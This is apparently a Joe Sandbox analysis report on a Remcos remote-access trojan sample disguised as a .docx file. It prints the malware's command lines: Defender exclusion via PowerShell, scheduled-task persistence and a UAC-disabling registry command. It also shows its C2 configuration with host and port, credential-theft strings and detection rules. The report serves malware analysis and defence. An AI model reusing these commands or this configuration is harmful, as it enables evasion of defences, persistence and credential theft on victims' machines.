Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Overview

General Information

Sample name:#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
renamed because original name is a hash value
Original sample name:-.docx.pif.exe
Analysis ID:1466661
MD5:a048afa687356f7d1b0fc9375ca13d06
SHA1:ec3f1158191496c89ce09ccb1dc699278b2a506a
SHA256:f0ec07e537c7bf74abbc66af82e1f273fceca81467e1d74ed69514107421de61
Tags:exepif
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • #U8f6e#U6905-#U89c4#U683c.docx.pif.exe (PID: 3628 cmdline: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe" MD5: A048AFA687356F7D1B0FC9375CA13D06)
    • powershell.exe (PID: 4368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6136 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6600 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 4304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • TkdxROLUOVpK.exe (PID: 2892 cmdline: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe MD5: A048AFA687356F7D1B0FC9375CA13D06)
    • schtasks.exe (PID: 3292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 4744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • vbc.exe (PID: 5456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\gaban\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x690a8:$a1: Remcos restarted by watchdog!
                • 0x69620:$a3: %02i:%02i:%02i:%03i
                0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpackREMCOS_RAT_variantsunknownunknown
                • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
                • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6316c:$str_b2: Executing file:
                • 0x641ec:$str_b3: GetDirectListeningPort
                • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63d18:$str_b7: \update.vbs
                • 0x63194:$str_b9: Downloaded file:
                • 0x63180:$str_b10: Downloading file:
                • 0x63224:$str_b12: Failed to upload file:
                • 0x641b4:$str_b13: StartForward
                • 0x641d4:$str_b14: StopForward
                • 0x63c70:$str_b15: fso.DeleteFile "
                • 0x63c04:$str_b16: On Error Resume Next
                • 0x63ca0:$str_b17: fso.DeleteFolder "
                • 0x63214:$str_b18: Uploaded file:
                • 0x631d4:$str_b19: Unable to delete:
                • 0x63c38:$str_b20: while fso.FileExists("
                • 0x636b1:$str_c0: [Firefox StoredLogins not found]
                0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x62f7c:$s1: CoGetObject
                • 0x62f90:$s1: CoGetObject
                • 0x62fac:$s1: CoGetObject
                • 0x6cf38:$s1: CoGetObject
                • 0x62f3c:$s2: Elevation:Administrator!new:
                Click to see the 45 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ProcessId: 4368, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ProcessId: 4368, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe, ParentImage: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe, ParentProcessId: 2892, ParentProcessName: TkdxROLUOVpK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp", ProcessId: 3292, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", ProcessId: 6600, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ProcessId: 4368, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", ProcessId: 6600, ProcessName: schtasks.exe

                Stealing of Sensitive Information

                barindex
                Source: Registry Key setAuthor: Joe Security: Data: Details: 3A 22 D7 FF B5 88 35 F7 AA 82 64 02 49 D7 0F 80 19 35 91 19 F2 25 CD D7 85 75 A1 85 8A 26 C7 F7 B1 39 D6 07 46 53 8C AA C3 C1 9B 48 71 08 E2 D0 74 99 11 0A 47 06 49 72 0B 5F 36 51 E0 6D EE 7F 6F 69 61 60 16 A1 01 FB 21 62 6E C5 E6 A2 62 A0 30 D1 9B 41 1D B3 B3 F0 DC C7 9B DB E7 96 BD FC C3 C6 E0 7A D5 55 72 CC 19 1E 8B 8B , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, ProcessId: 4304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3\exepath
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: www.vipguyclassproject2024.spaceAvira URL Cloud: Label: malware
                Source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeVirustotal: Detection: 60%Perma Link
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeReversingLabs: Detection: 65%
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeVirustotal: Detection: 60%Perma Link
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeJoe Sandbox ML: detected
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeJoe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00433837
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e6f7eea8-2

                Exploits

                barindex
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR

                Privilege Escalation

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004074FD _wcslen,CoGetObject,15_2_004074FD
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407C97
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 4x nop then jmp 0476A92Eh0_2_0476AC62
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 4x nop then jmp 04AE9BBEh10_2_04AE9EF2

                Networking

                barindex
                Source: Malware configuration extractorURLs: www.vipguyclassproject2024.space
                Source: unknownDNS traffic detected: query: www.vipguyclassproject2024.space replaycode: Name error (3)
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
